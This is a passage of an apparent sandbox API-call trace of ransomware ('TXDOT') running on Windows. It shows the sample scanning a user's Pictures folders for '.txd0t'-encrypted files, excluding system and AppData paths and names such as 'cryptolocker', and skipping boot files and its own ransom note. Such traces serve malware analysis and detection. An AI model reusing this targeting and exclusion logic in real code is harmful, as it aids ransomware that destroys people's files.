StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.708] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.708] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg.txd0t", psz2=".") returned 1 [0129.708] StrCmpW (psz1="6to-Do2T3Y6Ag.jpg.txd0t", psz2="..") returned 1 [0129.708] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="6to-Do2T3Y6Ag.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\6to-Do2T3Y6Ag.jpg.txd0t" [0129.708] PathFindExtensionW (pszPath="6to-Do2T3Y6Ag.jpg.txd0t") returned=".txd0t" [0129.708] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.708] StrCmpW (psz1="7ln6G64dp6.gif.txd0t", psz2=".") returned 1 [0129.708] StrCmpW (psz1="7ln6G64dp6.gif.txd0t", psz2="..") returned 1 [0129.708] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="7ln6G64dp6.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\7ln6G64dp6.gif.txd0t" [0129.708] PathFindExtensionW (pszPath="7ln6G64dp6.gif.txd0t") returned=".txd0t" [0129.708] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.709] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", psz2=".") returned 1 [0129.709] StrCmpW (psz1="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", psz2="..") returned 1 [0129.709] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.709] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.709] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t" [0129.709] PathFindExtensionW (pszPath="ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned=".txd0t" [0129.709] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.709] StrCmpW (psz1="Camera Roll", psz2=".") returned 1 [0129.709] StrCmpW (psz1="Camera Roll", psz2="..") returned 1 [0129.709] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.709] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.709] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Camera Roll", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system32\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\system\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\local\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\boot\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\perflogs\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\programdata\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\drivers\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\wsus\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="crypt_detect") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="cryptolocker") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="ransomware") returned 0x0 [0129.709] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\WINDOWS") returned 0x0 [0129.710] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.710] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", lpSrch="C:\\Program Files") returned 0x0 [0129.710] GetProcessHeap () returned 0xe30000 [0129.710] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ca) returned 0xed90d0 [0129.710] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll" [0129.710] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll", psz2="\\*", cchMax=1098 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*" [0129.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.710] StrCmpW (psz1=".", psz2=".") returned 0 [0129.710] StrCmpW (psz1="..", psz2=".") returned 1 [0129.710] StrCmpW (psz1="..", psz2="..") returned 0 [0129.710] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.710] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.711] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.711] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.711] StrCmpW (psz1="dF_BgEryZj.gif.txd0t", psz2=".") returned 1 [0129.711] StrCmpW (psz1="dF_BgEryZj.gif.txd0t", psz2="..") returned 1 [0129.711] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="dF_BgEryZj.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\dF_BgEryZj.gif.txd0t" [0129.711] PathFindExtensionW (pszPath="dF_BgEryZj.gif.txd0t") returned=".txd0t" [0129.711] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.711] StrCmpW (psz1="F1oeE.png.txd0t", psz2=".") returned 1 [0129.711] StrCmpW (psz1="F1oeE.png.txd0t", psz2="..") returned 1 [0129.711] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="F1oeE.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\F1oeE.png.txd0t" [0129.711] PathFindExtensionW (pszPath="F1oeE.png.txd0t") returned=".txd0t" [0129.711] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.711] StrCmpW (psz1="gpNFvPMeWkFC.gif.txd0t", psz2=".") returned 1 [0129.711] StrCmpW (psz1="gpNFvPMeWkFC.gif.txd0t", psz2="..") returned 1 [0129.711] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="gpNFvPMeWkFC.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\gpNFvPMeWkFC.gif.txd0t" [0129.711] PathFindExtensionW (pszPath="gpNFvPMeWkFC.gif.txd0t") returned=".txd0t" [0129.711] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.711] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", psz2=".") returned 1 [0129.711] StrCmpW (psz1="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", psz2="..") returned 1 [0129.711] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.711] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="g_PWWk0DwHdiVJ7TQ.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t" [0129.712] PathFindExtensionW (pszPath="g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned=".txd0t" [0129.712] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.712] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png.txd0t", psz2=".") returned 1 [0129.712] StrCmpW (psz1="JNDCEREvKtt-06-A0UX8.png.txd0t", psz2="..") returned 1 [0129.712] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.712] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.712] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="JNDCEREvKtt-06-A0UX8.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\JNDCEREvKtt-06-A0UX8.png.txd0t" [0129.712] PathFindExtensionW (pszPath="JNDCEREvKtt-06-A0UX8.png.txd0t") returned=".txd0t" [0129.712] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.712] StrCmpW (psz1="kG7T_G4j-", psz2=".") returned 1 [0129.712] StrCmpW (psz1="kG7T_G4j-", psz2="..") returned 1 [0129.712] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0129.712] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0129.712] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="kG7T_G4j-", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system32\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\system\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\local\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\boot\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\perflogs\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\programdata\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\drivers\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\wsus\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="crypt_detect") returned 0x0 [0129.712] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="cryptolocker") returned 0x0 [0129.713] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="ransomware") returned 0x0 [0129.713] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\WINDOWS") returned 0x0 [0129.713] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.713] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", lpSrch="C:\\Program Files") returned 0x0 [0129.713] GetProcessHeap () returned 0xe30000 [0129.713] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c6) returned 0xed90d0 [0129.713] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.713] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\*", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*" [0129.713] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf84b3990, ftCreationTime.dwHighDateTime=0x1d5e44a, ftLastAccessTime.dwLowDateTime=0x52f50403, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52f50403, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.713] StrCmpW (psz1=".", psz2=".") returned 0 [0129.713] StrCmpW (psz1="..", psz2=".") returned 1 [0129.713] StrCmpW (psz1="..", psz2="..") returned 0 [0129.713] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.713] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.713] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.713] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.713] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\!TXDOT_READ_ME!.txt" [0129.713] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.713] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.713] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.714] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.714] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.714] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.714] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif.txd0t", psz2=".") returned 1 [0129.714] StrCmpW (psz1="-aUMUjkCqPRwR9Vt.gif.txd0t", psz2="..") returned 1 [0129.714] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="-aUMUjkCqPRwR9Vt.gif.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\-aUMUjkCqPRwR9Vt.gif.txd0t" [0129.714] PathFindExtensionW (pszPath="-aUMUjkCqPRwR9Vt.gif.txd0t") returned=".txd0t" [0129.714] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.714] StrCmpW (psz1="0 jXVleh5y.bmp.txd0t", psz2=".") returned 1 [0129.714] StrCmpW (psz1="0 jXVleh5y.bmp.txd0t", psz2="..") returned 1 [0129.714] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="0 jXVleh5y.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\0 jXVleh5y.bmp.txd0t" [0129.714] PathFindExtensionW (pszPath="0 jXVleh5y.bmp.txd0t") returned=".txd0t" [0129.714] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.714] StrCmpW (psz1="3w6B72hITb.png.txd0t", psz2=".") returned 1 [0129.714] StrCmpW (psz1="3w6B72hITb.png.txd0t", psz2="..") returned 1 [0129.714] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="3w6B72hITb.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\3w6B72hITb.png.txd0t" [0129.714] PathFindExtensionW (pszPath="3w6B72hITb.png.txd0t") returned=".txd0t" [0129.714] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.714] StrCmpW (psz1="Bn2jVBj5I1Q6.png.txd0t", psz2=".") returned 1 [0129.714] StrCmpW (psz1="Bn2jVBj5I1Q6.png.txd0t", psz2="..") returned 1 [0129.714] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0129.714] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="Bn2jVBj5I1Q6.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\Bn2jVBj5I1Q6.png.txd0t" [0129.714] PathFindExtensionW (pszPath="Bn2jVBj5I1Q6.png.txd0t") returned=".txd0t" [0129.714] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.715] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif.txd0t", psz2=".") returned 1 [0129.715] StrCmpW (psz1="bwUCcMWGBF1Mcn_.gif.txd0t", psz2="..") returned 1 [0129.715] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 